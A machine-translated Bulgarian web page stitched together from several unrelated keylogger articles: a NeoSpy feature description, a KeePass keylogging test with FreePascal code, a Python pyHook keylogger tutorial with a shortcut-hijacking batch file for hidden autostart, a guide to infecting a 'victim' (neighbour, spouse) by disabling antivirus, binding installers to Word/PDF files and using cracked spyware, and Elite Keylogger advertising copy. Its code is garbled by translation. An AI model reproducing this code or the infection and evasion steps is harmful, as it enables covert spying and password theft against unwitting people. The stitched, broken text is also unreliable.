Keylogger онлайн. Нуждаете се от кийлогър? Два вида Keyloggers и как те влияят на вашия компютър

Keyloggerе програма, която чете натиснатите клавиши и ги записва във файл. В бъдеще можете да видите какво е написал човекът на компютъра, какви съобщения е написал и какви пароли е въвел. Друго име за keylogger е keylogger, от английския „keylogger“, което буквално означава „бутони за запис“.

В програмата NeoSpy функцията keylogger е активирана по подразбиране; в този режим програмата записва текст, комбинации от клавишни комбинации и пароли, въведени на клавиатурата. Управлението на настройките на keylogger се намира в менюто „Настройки за проследяване“ – „Запис на журнал“ – „Клавиатура“. Можете да изберете един от двата режима на работа на програмата: стандартен и алтернативен. Препоръчително е да използвате стандартната опция през 99% от времето, но ако има конфликт с вашия антивирусен софтуер, можете да активирате алтернативния режим.

Настройване на кийлогър


Дневникът на клавиатурата винаги се записва в пълен формат, включително служебните ключове. Пример за такъв дневник може да се види на илюстрацията. Докато преглеждате отчета, можете да забраните показването на непечатаеми знаци и да видите дневника като обикновен текст, по-достъпен за свободно четене.


Пример за Keylogger

За да се опрости работата с отчети, въведените пароли се маркират в списъка с натискания на клавиши. По този начин можете да разберете паролите на вашето дете и, ако е необходимо, да го защитите от нежелани познанства. Ако програмата NeoSpy се използва в предприятие за наблюдение на служители, тогава събирането на лични данни и кореспонденция е забранено от законите на повечето страни, така че тази опция трябва да бъде деактивирана или служителят трябва да бъде уведомен писмено за контрол от ръководството и недопустимостта на използването на компютър в организацията за лична кореспонденция.

За да проверя сигурността на паролите, въведени чрез KeePass, реших да напиша прост кийлогър с допълнително улавяне на данни от клипборда. Целият код отне няколко реда във FreePascal.

Паролите, без допълнителни мерки за сигурност и правилна конфигурация на KeePass, се оказаха доста уязвими.

Кодът на кийлогъра се поставя в цикъл на таймера, който се актуализира на всеки 10 ms. Използвани модули: Windows и ClipBrd.

//Сравнете текущото състояние на ключовете за f:= 0 до 255 do if a[f]<>GetAsyncKeyState(f) след това започнете //Реакция на натискане на клавиш, ако KeePass.Checked и (GetAsyncKeyState(f) = 0) тогава Memo1.Caption:= Memo1.Caption + chr(f);<>//Реакция при натискане на клавиш, ако не е KeePass.Checked и (GetAsyncKeyState(f)<>0) след това Memo1.Caption:= Memo1.Caption + chr(f);
край;

//Запазва текущото състояние на ключовете в масив за f:= 0 до 255 do a[f] := GetAsyncKeyState(f);

//Пише, когато се правят промени в клипборда, ако s

След това Clipboard.AsText започва s:= Clipboard.AsText;

Memo2.Caption:= Memo2.Caption + s + " ";

край;

Програмата Simple Logger изглежда така:

Прозорецът -Клавиатура- показва клавишите без оглед на регистъра и езика на въвеждане. Показва се символът, чийто номер е равен на кода на клавиша: chr(f). Програмата може да бъде модифицирана, за да показва правилно всички символи, но това не е необходимо за това изследване.

Копирането в прозореца -Clipboard- се извършва, когато съдържанието на буфера се промени.

Слабости на KeePass и тяхното отстраняване

1. Въведете основната парола

По подразбиране основната парола в KeePass се въвежда без защитен режим, така че може лесно да бъде определена в Simple Logger. Това е най-критичното място в сигурността, защото... тук получаваме достъп до цялата база данни с пароли наведнъж.

За да разрешите проблема, трябва да активирате настройката за сигурност „Въведете главната парола в защитен режим (подобно на UAC в Windows Vista и по-нова версия).“ Този режим предотвратява достъпа на регистратора до клавиатурата. Освен това е невъзможно да се направи екранна снимка, за да се определи местоположението на ключовия файл.

Този режим се активира само при въвеждане на основната парола. Защитата на други пароли ще бъде обсъдена допълнително. 2. Клипборд

Simple Logger реагира на промени в клипборда 100 пъти в секунда. По този начин въвеждането на паролата в буфера и след това изтриването й след няколко секунди не осигурява защита в този случай.

Simple Logger не взема под внимание клавишните комбинации по никакъв начин. Както можете да видите, клавишът Shift се показва като специален знак (подобно на „+“) и „?“. Shift се освобождава преди и след главна буква. Това обаче е достатъчно, за да разберете паролата.

За да разрешите този проблем, можете да използвате настройката „Двойна сложност на автоматичното набиране“ в KeePass. В този случай KeePass ще въведе част от паролата от клавиатурата и част през клипборда, като разбърква стойностите. Това ви позволява да заобиколите някои кийлогъри.

Simple Logger ще реагира на двойното усложнение на автоматичното набиране, както следва:

  • Поставяне от клипборда "Ctrl + V" се показва като "V◄?";
  • Стрелка наляво – “%” (ключов код и символ #37);
  • Стрелка надясно - """ (ключов код и символ #39).
Можете да напишете малък алгоритъм и да възстановите правилната парола, като използвате данни от двата прозореца. Тази настройка усложнява работата на кийлогъра, но не гарантира защита - паролата може лесно да бъде възстановена, ако желаете.

Допълнителните мерки за защита могат да помогнат срещу кийлогър, предназначен за KeePass.

4. Допълнителна защита

Някои софтуерни пакети имат функции като:
  • Защита на въвеждане на данни от хардуерна клавиатура;
  • Защитен браузър.
Когато активирате защита при въвеждане на данни от хардуерна клавиатура, Simple Logger вече не може да получава данни от автоматичното въвеждане на KeePass, ако са въведени във формата за парола в браузъра. В този случай слабото място ще бъде работата през клипборда.

Когато използвате защитен браузър, не беше възможно да получите достъп до клипборда и клавиатурата с помощта на Simple Logger. Освен това нямаше начин да се правят екранни снимки.

Вместо заключение

След като разгледах как нашите служители използват KeePass, открих, че някои:
  • не използвайте UAC;
  • не използвайте автоматично набиране, просто копирайте пароли през буфер;
  • оставяйте програмата отворена, когато напускате работното място;
  • използвайте настройките по подразбиране, без да конфигурирате политика за сигурност.
Аз съм мениджър в малка фирма, малко ме интересува програмирането. Не съм специалист по техника или сигурност, така че ще се радвам, ако по-опитни специалисти посочат недостатъците на малкото ми проучване.

Тествах най-новата версия на KeePass 2.36 на Windows 8.1. За да бъдем честни, трябва да се отбележи, че този проблем не е само проблем на KeePass. Има много други пазачи на пароли с по-висока или по-малка степен на надеждност, но това е тема за друго изследване.

Връзки

  1. Simple Logger в GitHub
    //На кого му пука, можете да намерите exe файл в архива “SimpleLogger_for_Win64.7z”. Програмата не позволява пълноценен кийлог; предназначена е за проучване на сигурността и за информационни цели.
UPD (27.07.2017 г.)

Плъгин за браузър

Както отбеляза потребителят dartraiden, възможно е да използвате модула KeepPassHttpзаедно с добавка за браузър PassIFoxили ChromeIPass. Този плъгин (според разработчика) осигурява сигурно излагане на записи на KeePass през HTTP.

Тази комбинация ви позволява автоматично да попълвате вашето потребителско име и парола в браузъра, когато KeePass е отключен. Simple Logger не реагира по никакъв начин в този случай.

Слабото място на ChromeIPass е генерирането на нова парола, защото... той се копира през клипборда и се вижда на екрана. В този случай е по-добре да генерирате нова парола в самия KeePass.

Създаване на нова главна парола

Както е отбелязано от arthur_veber:
При подмяна на основната парола, както и при създаване на нова, не се използва безопасен режим.

В този случай Simple Logger прихваща главната парола, въведена в KeePass.

Не помага и виртуалната екранна клавиатура от известен производител, която, подобно на автоматичното набиране на KeePass, работи въз основа на събитие на натискане на клавиш.

Тук е трудно да се дават съвети. Вероятно трябва да привлечем вниманието на разработчиците към този проблем.

Други средства за атака

Както потребителят qw1 беше първият, който посочи, ако системата, на която е инсталиран KeePass, е компрометирана, тогава могат да се използват други средства за атака освен keylogger. В този случай списъкът с действия за противодействие на атаката ще зависи от конкретната ситуация.

За съжаление е невъзможно в една статия да се обхванат всички мерки за сигурност, които са необходими за съхраняване на пароли.

Здравейте, QUAZAR е отново тук. Днес ще ви покажа как да създадете прост кийлогър в Python. Разбира се, този кийлогър не може да се конкурира с такива гиганти като, но въпреки това може да намери своето приложение.

Какво е keylogger?

Можете да прочетете подробно какво е кийлогър и за видовете кийлогъри в статията „“. За да намерите допълнителни материали по темата, използвайте търсенето в сайта, което се намира в горния десен ъгъл. Просто въведете думата "keylogger" или "keylogger".

Прост кийлогър в Python

За да създадем keylogger, имаме нужда от:

  • Операционна система: Windows или MacOs (може да се използва и всеки Linux, но не съм го пробвал лично)
  • Python, инсталиран на целевата машина, както и специални библиотеки.

Този материал е само за информационни цели. Информацията, представена в тази статия, е предоставена само за информационни цели. Нито редакторите на уебсайта www.site, нито авторът на публикацията носят каквато и да е отговорност за вреди, причинени от материала в тази статия.

Създаване на прост keylogger в Python

Първо трябва да изтеглите и инсталирате Python.


Прост кийлогър в Python

След като инсталирате Python, трябва да инсталирате модулите "pyHook" и "pywin32". На този сайт ще намерите 32 и 64 битови версии за Windows и други операционни системи. Изтеглете „PYhook“ и „pyWin32“ според вашата инсталирана версия на Python и Windows (32-битова или 64-битова).


Keylogger в Python. PYhook модул
Keylogger в Python. pyWin32 модул

След като го изтеглите, инсталирайте и отворете IDLE (Python GUI) меню от менюто "Старт".

Прост кийлогър в Python

Отидете в менюто "Файл" и щракнете върху елемента "Нов файл". След това поставете кода на кийлогъра:

#Име: QUAZAR
#Уебсайт: www.сайт
импортиране на pyHook, pythoncom, sys, регистриране
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(събитие):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(събитие.Ascii)
logging.log(10,chr(event.Ascii))
върне True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

И го запазете, като наименувате файла Keylogger.pyw. Просто не запазвайте файла в главната директория C: където имате нужда от администраторски права за копиране и изтриване на файлове. Създайте нова папка на вашия C: диск или някое друго място, където нямате нужда от администраторски права, за да копирате файлове и запишете Keylogger.pyw там.

Можете да изберете произволно местоположение като файл с изходен отчет „file_log = „C:keyloggerlog.txt“, но за предпочитане, разбира се, някое скрито място на вашия твърд диск. В този пример ще запазя файла с отчета на диск в основната директория C:. Все пак няма какво да крия.

Автоматично стартиране на кийлогър в Python

Keylogger е готов. Сега трябва да се уверим, че Keylogger стартира скрито от потребителя и автоматично при зареждане на Windows. Това може да се реализира по различни начини. Нека се опитаме да го направим с помощта на bat файл, като свържем стартирането на keylogger с някаква програма или като го регистрираме при стартиране.

Първо създайте bat файл. Копирайте и поставете следния код в Notepad:

::Име: QUAZAR
::Уебсайт: www.site
@echo изключено
стартирайте "" "C:keyloggerkeylogger.pyw"
стартирайте "" "C:Program FilesOperalauncher.exe"

В първия ред трябва да въведете пътя до файла keylogger.pyw (в моя случай „C:keylogger.pyw“). Във втория ред трябва да въведете пътя до програмата, която потребителят обикновено използва (в моя случай браузърът Opera).

След като редактирате, запишете файла с разширение .bat (в моя случай logger.bat) на някое скрито място на вашия компютър (в моя случай в „C:keylogger.bat“).

Сега отидете на работния плот и изберете пряк път за често използвана програма (в моя случай това е браузърът Opera). Щракнете с десния бутон на мишката, за да извикате контекстното меню и отидете до свойствата на прекия път. В полето „Обект“ въведете пътя до bat файла на keylogger „C:keyloggerlogger.bat“.

След като направите промени, иконата за бърз достъп също ще се промени. Но това може лесно да се реши в раздела със свойства (вижте екранната снимка по-горе).

Кой от нас не е искал поне веднъж да се почувства като готин хакер и да разбие поне нещо? :) Дори и да не, тогава нека поговорим за това колко страхотно би било да получите парола от вашата поща/социална мрежа. мрежата на приятел, съпруга/съпруг, съквартирант, помислен поне веднъж от всеки. :) Да, и все отнякъде трябва да се започне! Значителна част от атаките (хакерството) включва заразяване на компютъра на жертвата с така наречените кийлогъри (шпионски софтуер).

И така, в днешната статия ще говорим за това какво са безплатни програми за наблюдение на windows базирани компютри, където можете да изтеглите пълните им версии, как да заразите компютъра на жертвата с тях и какви са особеностите на тяхното използване.

Но първо, малко въведение.

Какво представляват кийлогърите и защо са необходими?

Мисля, че сами се досещате за какво става въпрос. Като правило те са вид програма, която е скрита (въпреки че това не винаги е така), инсталирана на компютъра на жертвата, след което записва абсолютно всички натискания на клавиши на този възел. Освен това, в допълнение към самите кликвания, обикновено се записва следното: датата и часът на кликването (действието) и програмата, в която са извършени тези действия (браузър, включително адреса на уебсайта (ура, веднага виждаме какви са паролите са за!); локално приложение; системни услуги (включително пароли за влизане в Windows) и др.).

От тук веднага се вижда един от проблемите: получих достъп до компютъра на моя съсед за няколко минути и искам да получа паролата й от VK! Инсталирах чудотворната програма и върнах компютъра. Как мога да потърся пароли по-късно? Търсите начин да й вземете отново компютъра? Добрата новина е: обикновено не. Повечето кийлогъри са способни не само да съхраняват цялата натрупана база данни от действия локално, но и да я изпращат от разстояние. Има много опции за изпращане на регистрационни файлове:

  • Фиксиран имейл (може да има няколко) е най-удобният вариант;
  • FTP сървър (който го има);
  • SMB сървър (екзотичен и не много удобен).
  • Фиксирано флаш устройство (поставяте го в USB порта на компютъра на жертвата и всички регистрационни файлове се копират там автоматично в невидим режим!).

Защо е необходимо всичко това? Мисля, че отговорът е очевиден. В допълнение към баналната кражба на пароли, някои кийлогъри могат да направят редица други хубави неща:

  • Записване на кореспонденция в определени социални мрежи. мрежи или месинджъри (например Skype).
  • Правене на екранни снимки на екрана.
  • Преглед/заснемане на данни от уеб камера (което може да бъде много интересно).

Как да използваме кийлогъри?

И това е труден въпрос. Трябва да разберете, че просто намирането на удобен, функционален и добър кийлогър не е достатъчно.

така че какво е необходимо, за да работи успешно една шпионска програма?:

  • Администраторски достъп до отдалечен компютър.
    Освен това това не означава непременно физически достъп. Можете лесно да получите достъп до него чрез RDP (Услуга за отдалечен работен плот); TeamViewer; AmmyAdmin и др.
    По правило най-големите трудности са свързани с тази точка. Наскоро обаче написах статия за това как да получите администраторски права в Windows.
  • Анонимен имейл / ftp (по който няма да бъдете идентифицирани).
    Разбира се, ако разбивате леля Шура за съседа си, тази точка може безопасно да бъде пропусната. Както е в случая, ако винаги имате под ръка компютъра на жертвата (ала, разберете паролите на брат си/сестра си).
  • Липса на работещи антивируси / вътрешни системи за защита на Windows.
    Повечето публични кийлогъри (които ще бъдат обсъдени по-долу) са известни на по-голямата част от антивирусния софтуер (въпреки че има регистриращи вируси, които са вградени в ядрото на ОС или системния драйвер, и антивирусите вече не могат да ги открият или унищожат, дори и да имат ги откри). Поради гореизложеното, антивирусният софтуер, ако има такъв, ще трябва да бъде безмилостно унищожен. В допълнение към антивирусите, системи като Windows Defender (те се появяват за първи път в Windows 7 и по-късно) също представляват опасност за нашия шпионски софтуер. Те откриват подозрителна активност в софтуер, работещ на компютър. Можете лесно да намерите информация как да се отървете от тях в Google.

Това може би са всички необходими и достатъчни условия за вашия успех в областта на кражбата на чужди пароли / кореспонденция / снимки или каквото друго искате да посегнете.

Какви видове шпионски софтуер има и къде мога да ги изтегля?

И така, нека започнем прегледа на основните кийлогъри, които използвах в ежедневната си практика с връзки към безплатни изтегляния на техните пълни версии (т.е. всички версии са най-новите в момента (за които е възможно да се намери лек) и с вече работещи и тествани кракове).

0. Плъхът!

Оценки (от 10):

  • Стелт: 10
  • Удобство/използваемост: 9
  • Функционалност: 8

Това е просто бомба, а не кийлогър! В работно състояние отнема 15-20 KB. Защо да се изненадвате: той е написан изцяло на асемблер (програмисти ветерани плачат) и е написан предимно от ентусиазирани хакери, поради което нивото на неговата секретност е просто невероятно: работи на ниво ядро ​​на ОС!

Освен това пакетът включва FileConnector - мини-програма, която ви позволява да свържете този кийлогър с абсолютно всяка програма. В резултат на това получавате нов exe с почти същия размер и при стартиране работи точно като програмата, с която сте го залепили! Но след първото стартиране вашият кийлогър ще бъде автоматично инсталиран в невидим режим с параметрите за изпращане на регистрационни файлове, които сте посочили преди това. Удобно, нали?

Отлична възможност за социално инженерство (донесете файл/презентация на игра на приятел на флаш устройство или дори просто Word документ (ще ви кажа как да създадете exe файл, който стартира определен word/excel файл в един от следващите ми статии), стартирайте, всичко е наред и прекрасно, но приятелят вече е невидимо заразен!). Или просто изпращате този файл на приятел по пощата (за предпочитане връзка за изтеглянето му, тъй като съвременните пощенски сървъри забраняват изпращането на exe файлове). Разбира се, все още има риск от антивирусен софтуер по време на инсталацията (но няма да съществува след инсталацията).

Между другото, с помощта на някои други техники можете да залепите всяка скрита инсталационна дистрибуция (те се намират в The Rat! и Elite keylogger) не само с exe файлове (които все още предизвикват подозрение сред повече или по-малко напреднали потребители), но и с обикновени word / excel и дори pdf файлове! Никой никога няма да помисли нищо за обикновен pdf, но това не е така! :) Как става това е тема на цяла отделна статия. Тези, които са особено ревностни, могат да ми пишат въпроси чрез формата за обратна връзка. ;)

Като цяло, The Rat! може да се описва много дълго и много. Това беше направено много по-добре от мен. Там има и връзка за изтегляне.

1. Елитен кийлогър

Оценки (от 10):

  • Стелт: 10
  • Удобство/използваемост: 9
  • Функционалност: 8

Може би един от най-добрите кийлогъри, създавани някога. Неговите възможности, в допълнение към стандартния набор (прихващане на всички кликвания в контекста на приложения / прозорци / сайтове), включват прихващане на незабавни съобщения, снимки от уеб камера и също - което е МНОГО важно! - прихващане на пароли за услуги WinLogon. С други думи, той прихваща паролите за влизане в Windows (включително тези за домейни!). Това стана възможно благодарение на работата му на ниво системен драйвер и стартирането дори на етапа на зареждане на операционната система. Благодарение на същата тази функция, тази програма остава напълно невидима както за Kasperosky, така и за целия друг анти-зловреден софтуер. Честно казано, не съм срещал нито един кийлогър, способен на това.

Не бива обаче да се самозаблуждавате твърде много. Самият инсталатор се разпознава от антивирусите много лесно и за да го инсталирате ще ви трябват администраторски права и деактивиране на всички антивирусни услуги. След инсталирането всичко ще работи перфектно във всеки случай.

В допълнение, описаната функция (работеща на ниво ядро ​​на ОС) въвежда изисквания за версията на ОС, на която ще работят кийлогърите. Версия 5-5.3 (линкове към които са дадени по-долу) поддържа всичко до и включително Windows 7. Win 8 / 10, както и семейството на Windows сървъри (2003 / 2008 / 2012) вече не се поддържат. Има версия 6, която работи перфектно, вкл. на win 8 и 10 обаче в момента не е възможно да се намери кракната версия. Вероятно ще се появи в бъдеще. Междувременно можете да изтеглите Elite keylogger 5.3 от връзката по-горе.

Няма режим на мрежова работа, поради което не е подходящ за използване от работодатели (за наблюдение на компютрите на техните служители) или цяла група хора.

Важен момент е възможността за създаване на инсталационна дистрибуция с предварително зададени настройки (например с посочен имейл адрес, на който ще трябва да се изпращат регистрационни файлове). В същото време накрая получавате комплект за разпространение, който при стартиране не показва абсолютно никакви предупреждения или прозорци, а след инсталиране може дори да се самоунищожи (ако поставите отметка на съответната опция).

Няколко екранни снимки на версия 5 (за да покажат колко красиво и удобно е всичко):

2. Всичко в едно keylogger.

Оценки (от 10):

  • Стелт: 3
  • Удобство/използваемост: 9
  • Функционалност: 8

Освен това е много, много удобно нещо. Функционалността е доста на нивото на Elite keylogger. Нещата са по-лоши със секретността. Паролите на Winlogon вече не се прихващат, това не е драйвер и не е вградено в ядрото. Той обаче е инсталиран в системни и скрити AppData директории, които не са толкова лесно достъпни за неоторизирани потребители (не тези, от чието име е инсталиран). Независимо от това, антивирусите рано или късно успешно правят това, което прави това нещо не особено надеждно и безопасно, когато се използва, например, на работа, за да шпионирате собствените си началници. ;) Да го залепиш за нещо или да криптираш кода, за да го скриеш от антивирусите, няма да стане.

Работи на всяка версия на Win OS (което е хубаво и практично).

Що се отнася до останалото, всичко е наред: регистрира всичко (с изключение на паролите за влизане в Windows), изпраща го навсякъде (включително имейл, ftp, фиксирано флаш устройство). По отношение на удобството всичко също е отлично.

3. Spytech SpyAgent.

Оценки (от 10):

  • Стелт: 4
  • Удобство/използваемост: 8
  • Функционалност: 10

Също така добър кийлогър, макар и със съмнителна секретност. Всички поддържани версии на ОС също са възможни. Функционалността е подобна на предишните опции. Има интересна функция за самоунищожение след определен период от време (или при достигане на предварително определена дата).

Освен това има възможност за запис на видео от уеб камера и звук от микрофон, което също може да бъде много популярно и което предишните два представителя нямат.

Има мрежов режим на работа, който е удобен за наблюдение на цяла мрежа от компютри. Между другото, StaffCop го има (не е включен в прегледа поради безполезността му за един потребител - физическо лице). Може би тази програма е идеална за работодателите да шпионират своите служители (въпреки че лидерите в тази област са безусловно StaffCop и LanAgent - ако сте юридическо лице, не забравяйте да погледнете в тяхната посока). Или да следите вашето потомство, което обича да седи и да гледа „сайтове за възрастни“. Тези. където това, което е необходимо, не е прикриване, а удобство (включително куп красиви отчети за журнали и т.н.) и функционалност за блокиране на определени сайтове/програми (SpyAgent също го има).

4. Персонален монитор Spyrix.

Оценки (от 10):

  • Стелт: 4
  • Удобство/използваемост: 6
  • Функционалност: 10

Функционалността е на нивото на предишния кандидат, но същите проблеми със секретността. В допълнение, функционалността включва интересно нещо: копиране на файлове от USB устройства, поставени в компютъра, както и отдалечен преглед на регистрационни файлове през уеб акаунт на уебсайта на Spyrix (но ние ще изтеглим кракната версия, така че няма работят за нас).

5. Персонален монитор Spyrix.

Оценки (от 10):

  • Стелт: 3
  • Удобство/използваемост: 6
  • Функционалност: 8

Няма да го описвам подробно, защото... този екземпляр няма нищо, което един от предишните шпиони не е имал, но някой може да хареса този кийлогър (поне заради неговия интерфейс).

Какво получаваме в крайна сметка?

Проблемът с използването на кийлогър е по-скоро етичен, отколкото технически и до голяма степен зависи от вашите цели.

Ако сте работодател, който иска да контролира служителите си, не се колебайте да създадете StaffCop, вземете писмено разрешение от всички служители за подобни действия (в противен случай може да бъдете сериозно таксувани за такива неща) и работата е в чантата. Въпреки че аз лично знам по-ефективни начини за повишаване на ефективността на моите служители.

Ако сте начинаещ ИТ специалист, който просто иска да изпита какво е да разбиеш някого - и как работи това нещо като цяло, тогава се въоръжете с методи за социално инженерство и направете тестове на приятелите си, като използвате някой от дадените примери. Запомнете обаче: откриването на такава дейност от жертвите изобщо не насърчава приятелството и дълголетието. ;) И определено не трябва да тествате това в работата си. Помнете думите ми: имам опит с това. ;)

Ако целта ви е да шпионирате свой приятел, съпруг, съсед или може би дори го правите редовно и за пари, помислете добре дали си струва. В крайна сметка, рано или късно те могат да привлекат. И не си струва: „ровенето в чуждо мръсно пране не е приятно удоволствие“. Ако все пак имате нужда (или може би работите в областта на разследването на компютърни престъпления и подобни задачи са част от професионалните ви отговорности), тогава има само две възможности: The Rat! и Elite Keylogger. В режим на скрита инсталация дистрибуции, залепени с word / excel / pdf. И е по-добре, ако е възможно, да се криптира с нов криптор. Само в този случай можем да гарантираме по-безопасни дейности и реален успех.

Но във всеки случай си струва да запомните, че компетентното използване на кийлогъри е само една малка връзка за постигане на целта (включително дори проста атака). Не винаги имате права на администратор, не винаги имате физически достъп и не всички потребители ще отварят, четат и още повече изтеглят вашите прикачени файлове/връзки (здравей социално инженерство), антивирусът не винаги ще бъде деактивиран /вашият кийлогър/криптор няма винаги да е непознат за тях. Всички тези и много неизброими проблеми могат да бъдат решени, но тяхното решение е тема на цяла поредица от отделни статии.

Накратко, току-що сте започнали да се гмуркате в сложния, опасен, но невероятно интересен свят на информационната сигурност. :)

С уважение,Лисяк А.С.

Elite Keylogger записва всички пароли, въведени на компютъра, като същевременно остава напълно невидим за потребителите! Ще можете да прихващате пароли, документи, имейли, чат съобщения и много други.

Пароли

Elite Keylogger работи в режим на драйвер от ниско ниво и се стартира преди системата Windows, което ви позволява да откриете пароли и влизания. Моля, обърнете внимание, че версията за Mac не може да записва пароли за вход в OS X.

Записване на чатове и поща

Elite Keylogger за Windows записва чатове и незабавни съобщения от много различни клиенти, включително MSN, AOL, ICQ, AIM, GTalk, Skype. Elite Keylogger за Mac може да записва разговори от Skype, Viber, iChat/Messages и Adium, както и изходящ имейл от двете страни.

Мрежов кийлогър

Elite Keylogger е идеално решение за отдалечен компютърен мониторинг. Трябва само да го инсталирате веднъж - и отчетите ще ви бъдат изпратени по имейл или качени на FTP сървър. Това прави тази помощна програма идеална за компании, които изискват компютърен мониторинг на служителите. Това приложение е напълно невидимо и не може да бъде открито от антивирусен или антишпионски софтуер (ако е инсталиран правилно).

Най-доброто прихващане на уебсайтове

Elite Keylogger е една от най-добрите шпионски програми поради способността си да записва посещения на уебсайтове за ВСИЧКИ популярни браузъри. Той напълно улавя адресите на уебсайтове в Internet Explorer, Firefox, Safari, Opera, Google Chrome и други браузъри. Всеки адрес на уебсайт се регистрира, заедно с клеймо за време на посещението, така че можете лесно да наблюдавате онлайн активността на вашите деца, за да сте сигурни, че са в безопасност.

Приятелски интерфейс

Толкова е лесен за използване. Монтажът е бърз и безболезнен дори за начинаещи. За тези, които се нуждаят от него, Elite Keylogger предоставя по-разширени опции като отдалечено инсталиране или предварителна конфигурация. Просто инсталирайте и можете да го конфигурирате и активирате за минути. Просто посочете как искате да получавате регистрационни файлове - и вече няма да е необходимо дори да докосвате администраторския интерфейс на шпионския софтуер, защото сега той ще направи всичко автоматично!

Много опции за изпращане на отчети

Elite Keylogger предоставя много опции за докладване. Те могат да ви бъдат изпратени по имейл, качени на FTP, прехвърлени на друг компютър в локалната мрежа или тайно копирани на USB устройство. Няма ограничения за размера на регистрационните файлове, предназначени за предаване.